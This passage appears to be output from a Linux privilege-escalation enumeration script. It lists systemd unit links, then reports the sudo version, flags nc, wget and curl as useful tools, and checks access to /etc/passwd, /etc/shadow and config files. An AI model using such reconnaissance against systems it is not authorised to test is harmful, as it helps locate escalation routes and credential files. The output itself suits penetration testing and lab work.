  1217. lrwxrwxrwx 1 root root 30 Mar 8 2018 systemd-hwdb-update.service -> ../systemd-hwdb-update.service
  1218. lrwxrwxrwx 1 root root 24 Mar 8 2018 systemd-udevd.service -> ../systemd-udevd.service
  1219. lrwxrwxrwx 1 root root 31 Mar 8 2018 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
  1220. lrwxrwxrwx 1 root root 20 Mar 8 2018 cryptsetup.target -> ../cryptsetup.target
  1221. lrwxrwxrwx 1 root root 22 Mar 8 2018 dev-hugepages.mount -> ../dev-hugepages.mount
  1222. lrwxrwxrwx 1 root root 19 Mar 8 2018 dev-mqueue.mount -> ../dev-mqueue.mount
  1223. lrwxrwxrwx 1 root root 28 Mar 8 2018 kmod-static-nodes.service -> ../kmod-static-nodes.service
  1224. lrwxrwxrwx 1 root root 36 Mar 8 2018 proc-sys-fs-binfmt_misc.automount -> ../proc-sys-fs-binfmt_misc.automount
  1225. lrwxrwxrwx 1 root root 32 Mar 8 2018 sys-fs-fuse-connections.mount -> ../sys-fs-fuse-connections.mount
  1226. lrwxrwxrwx 1 root root 26 Mar 8 2018 sys-kernel-config.mount -> ../sys-kernel-config.mount
  1227. lrwxrwxrwx 1 root root 25 Mar 8 2018 sys-kernel-debug.mount -> ../sys-kernel-debug.mount
  1228. lrwxrwxrwx 1 root root 36 Mar 8 2018 systemd-ask-password-console.path -> ../systemd-ask-password-console.path
  1229. lrwxrwxrwx 1 root root 25 Mar 8 2018 systemd-binfmt.service -> ../systemd-binfmt.service
  1230. lrwxrwxrwx 1 root root 27 Mar 8 2018 systemd-journald.service -> ../systemd-journald.service
  1231. lrwxrwxrwx 1 root root 32 Mar 8 2018 systemd-journal-flush.service -> ../systemd-journal-flush.service
  1232. lrwxrwxrwx 1 root root 36 Mar 8 2018 systemd-machine-id-commit.service -> ../systemd-machine-id-commit.service
  1233. lrwxrwxrwx 1 root root 31 Mar 8 2018 systemd-modules-load.service -> ../systemd-modules-load.service
  1234. lrwxrwxrwx 1 root root 30 Mar 8 2018 systemd-random-seed.service -> ../systemd-random-seed.service
  1235. lrwxrwxrwx 1 root root 25 Mar 8 2018 systemd-sysctl.service -> ../systemd-sysctl.service
  1236. lrwxrwxrwx 1 root root 37 Mar 8 2018 systemd-tmpfiles-setup-dev.service -> ../systemd-tmpfiles-setup-dev.service
  1237. lrwxrwxrwx 1 root root 33 Mar 8 2018 systemd-tmpfiles-setup.service -> ../systemd-tmpfiles-setup.service
  1238. lrwxrwxrwx 1 root root 30 Mar 8 2018 systemd-update-utmp.service -> ../systemd-update-utmp.service
  1239. lrwxrwxrwx 1 root root 24 Oct 12 2017 console-setup.service -> ../console-setup.service
  1240. lrwxrwxrwx 1 root root 25 Oct 12 2017 keyboard-setup.service -> ../keyboard-setup.service
  1241. lrwxrwxrwx 1 root root 19 Oct 12 2017 setvtrgb.service -> ../setvtrgb.service
  1242.  
  1243. /lib/systemd/system/sockets.target.wants:
  1244. total 28K
  1245. lrwxrwxrwx 1 root root 31 Mar 8 2018 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
  1246. lrwxrwxrwx 1 root root 30 Mar 8 2018 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
  1247. lrwxrwxrwx 1 root root 25 Mar 8 2018 systemd-initctl.socket -> ../systemd-initctl.socket
  1248. lrwxrwxrwx 1 root root 32 Mar 8 2018 systemd-journald-audit.socket -> ../systemd-journald-audit.socket
  1249. lrwxrwxrwx 1 root root 34 Mar 8 2018 systemd-journald-dev-log.socket -> ../systemd-journald-dev-log.socket
  1250. lrwxrwxrwx 1 root root 26 Mar 8 2018 systemd-journald.socket -> ../systemd-journald.socket
  1251. lrwxrwxrwx 1 root root 14 Jan 12 2017 dbus.socket -> ../dbus.socket
  1252.  
  1253. /lib/systemd/system/busnames.target.wants:
  1254. total 0
  1255.  
  1256. /lib/systemd/system/getty.target.wants:
  1257. total 4.0K
  1258. lrwxrwxrwx 1 root root 23 Mar 8 2018 getty-static.service -> ../getty-static.service
  1259.  
  1260. /lib/systemd/system/graphical.target.wants:
  1261. total 4.0K
  1262. lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
  1263.  
  1264. /lib/systemd/system/local-fs.target.wants:
  1265. total 4.0K
  1266. lrwxrwxrwx 1 root root 29 Mar 8 2018 systemd-remount-fs.service -> ../systemd-remount-fs.service
  1267.  
  1268. /lib/systemd/system/rc-local.service.d:
  1269. total 4.0K
  1270. -rw-r--r-- 1 root root 290 Feb 21 2018 debian.conf
  1271.  
  1272. /lib/systemd/system/rescue.target.wants:
  1273. total 4.0K
  1274. lrwxrwxrwx 1 root root 39 Mar 8 2018 systemd-update-utmp-runlevel.service -> ../systemd-update-utmp-runlevel.service
  1275.  
  1276. /lib/systemd/system/resolvconf.service.wants:
  1277. total 4.0K
  1278. lrwxrwxrwx 1 root root 42 Mar 8 2018 systemd-networkd-resolvconf-update.path -> ../systemd-networkd-resolvconf-update.path
  1279.  
  1280. /lib/systemd/system/sigpwr.target.wants:
  1281. total 4.0K
  1282. lrwxrwxrwx 1 root root 36 Mar 8 2018 sigpwr-container-shutdown.service -> ../sigpwr-container-shutdown.service
  1283.  
  1284. /lib/systemd/system/systemd-resolved.service.d:
  1285. total 4.0K
  1286. -rw-r--r-- 1 root root 200 Feb 21 2018 resolvconf.conf
  1287.  
  1288. /lib/systemd/system/systemd-timesyncd.service.d:
  1289. total 4.0K
  1290. -rw-r--r-- 1 root root 251 Feb 21 2018 disable-with-time-daemon.conf
  1291.  
  1292. /lib/systemd/system/timers.target.wants:
  1293. total 4.0K
  1294. lrwxrwxrwx 1 root root 31 Mar 8 2018 systemd-tmpfiles-clean.timer -> ../systemd-tmpfiles-clean.timer
  1295.  
  1296. /lib/systemd/system/runlevel1.target.wants:
  1297. total 0
  1298.  
  1299. /lib/systemd/system/runlevel2.target.wants:
  1300. total 0
  1301.  
  1302. /lib/systemd/system/runlevel3.target.wants:
  1303. total 0
  1304.  
  1305. /lib/systemd/system/runlevel4.target.wants:
  1306. total 0
  1307.  
  1308. /lib/systemd/system/runlevel5.target.wants:
  1309. total 0
  1310.  
  1311. /lib/systemd/system-generators:
  1312. total 708K
  1313. -rwxr-xr-x 1 root root 19K May 17 2018 snapd-generator
  1314. -rwxr-xr-x 1 root root 4.8K Apr 3 2018 cloud-init-generator
  1315. -rwxr-xr-x 1 root root 71K Mar 8 2018 systemd-cryptsetup-generator
  1316. -rwxr-xr-x 1 root root 59K Mar 8 2018 systemd-dbus1-generator
  1317. -rwxr-xr-x 1 root root 43K Mar 8 2018 systemd-debug-generator
  1318. -rwxr-xr-x 1 root root 79K Mar 8 2018 systemd-fstab-generator
  1319. -rwxr-xr-x 1 root root 39K Mar 8 2018 systemd-getty-generator
  1320. -rwxr-xr-x 1 root root 39K Mar 8 2018 systemd-hibernate-resume-generator
  1321. -rwxr-xr-x 1 root root 39K Mar 8 2018 systemd-insserv-generator
  1322. -rwxr-xr-x 1 root root 35K Mar 8 2018 systemd-rc-local-generator
  1323. -rwxr-xr-x 1 root root 31K Mar 8 2018 systemd-system-update-generator
  1324. -rwxr-xr-x 1 root root 103K Mar 8 2018 systemd-sysv-generator
  1325. -rwxr-xr-x 1 root root 119K Mar 8 2018 systemd-gpt-auto-generator
  1326. -rwxr-xr-x 1 root root 11K Apr 16 2016 lvm2-activation-generator
  1327.  
  1328. /lib/systemd/system-shutdown:
  1329. total 4.0K
  1330. -rwxr-xr-x 1 root root 160 Nov 8 2017 mdadm.shutdown
  1331.  
  1332. /lib/systemd/system-sleep:
  1333. total 4.0K
  1334. -rwxr-xr-x 1 root root 92 Mar 17 2016 hdparm
  1335.  
  1336. /lib/systemd/network:
  1337. total 12K
  1338. -rw-r--r-- 1 root root 404 Mar 8 2018 80-container-host0.network
  1339. -rw-r--r-- 1 root root 482 Mar 8 2018 80-container-ve.network
  1340. -rw-r--r-- 1 root root 80 Mar 8 2018 99-default.link
  1341.  
  1342. /lib/systemd/system-preset:
  1343. total 4.0K
  1344. -rw-r--r-- 1 root root 869 Mar 8 2018 90-systemd.preset
  1345.  
  1346.  
  1347. ### SOFTWARE #############################################
  1348. [-] Sudo version:
  1349. Sudo version 1.8.16
  1350.  
  1351.  
  1352. ### INTERESTING FILES ####################################
  1353. [-] Useful file locations:
  1354. /bin/nc
  1355. /bin/netcat
  1356. /usr/bin/wget
  1357. /usr/bin/curl
  1358.  
  1359.  
  1360. [-] Can we read/write sensitive files:
  1361. -rw-r--r-- 1 root root 1684 Jul 1 2018 /etc/passwd
  1362. -rw-r--r-- 1 root root 820 Jul 1 2018 /etc/group
  1363. -rw-r--r-- 1 root root 575 Oct 22 2015 /etc/profile
  1364. -rw-r----- 1 root shadow 1100 Jan 7 21:14 /etc/shadow
  1365.  
  1366.  
  1367. [-] Can't search *.conf files as no keyword was entered
  1368.  
  1369. [-] Can't search *.php files as no keyword was entered
  1370.  
  1371. [-] Can't search *.log files as no keyword was entered
  1372.  
  1373. [-] Can't search *.ini files as no keyword was entered
  1374.  
  1375. [-] All *.conf files in /etc (recursive 1 level):
  1376. -rw-r--r-- 1 root root 3028 Jun 22 2018 /etc/adduser.conf
  1377. -rw-r--r-- 1 root root 6488 Jun 22 2018 /etc/ca-certificates.conf
  1378. -rw-r--r-- 1 root root 2969 Nov 10 2015 /etc/debconf.conf
  1379. -rw-r--r-- 1 root root 604 Jul 2 2015 /etc/deluser.conf
  1380. -rw-r--r-- 1 root root 280 Jun 20 2014 /etc/fuse.conf
  1381. -rw-r--r-- 1 root root 2584 Feb 18 2016 /etc/gai.conf
  1382. -rw-r--r-- 1 root root 4781 Mar 17 2016 /etc/hdparm.conf
  1383. -rw-r--r-- 1 root root 92 Oct 22 2015 /etc/host.conf
  1384. -rw-r--r-- 1 root root 771 Mar 6 2015 /etc/insserv.conf
  1385. -rw-r--r-- 1 root root 110 Jun 22 2018 /etc/kernel-img.conf
  1386. -rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf
  1387. -rw-r--r-- 1 root root 191 Jan 18 2016 /etc/libaudit.conf
  1388. -rw-r--r-- 1 root root 703 May 6 2015 /etc/logrotate.conf
  1389. -rw-r--r-- 1 root root 14867 Apr 12 2016 /etc/ltrace.conf
  1390. -rw-r--r-- 1 root root 967 Oct 30 2015 /etc/mke2fs.conf
  1391. -rw-r--r-- 1 root root 497 May 4 2014 /etc/nsswitch.conf
  1392. -rw-r--r-- 1 root root 6920 Jan 11 2018 /etc/overlayroot.conf
  1393. -rw-r--r-- 1 root root 112 Jun 22 2018 /etc/overlayroot.local.conf
  1394. -rw-r--r-- 1 root root 552 Mar 16 2016 /etc/pam.conf
  1395. -rw-r--r-- 1 root root 0 Jun 22 2018 /etc/popularity-contest.conf
  1396. -rw-r--r-- 1 root root 1371 Jan 27 2016 /etc/rsyslog.conf
  1397. -rw-r--r-- 1 root root 100 Apr 11 2017 /etc/sos.conf
  1398. -rw-r--r-- 1 root root 1260 Mar 16 2016 /etc/ucf.conf
  1399. -rw-r--r-- 1 root root 338 Nov 18 2014 /etc/updatedb.conf
  1400. -rw-r--r-- 1 root root 2148 Jul 2 2018 /etc/sysctl.conf
  1401.  
  1402.  
  1403. [-] Any interesting mail in /var/mail:
  1404. total 0
  1405. drwxrwsr-x 1 root mail 0 Jun 22 2018 .
  1406. drwxr-xr-x 1 root root 108 Jun 22 2018 ..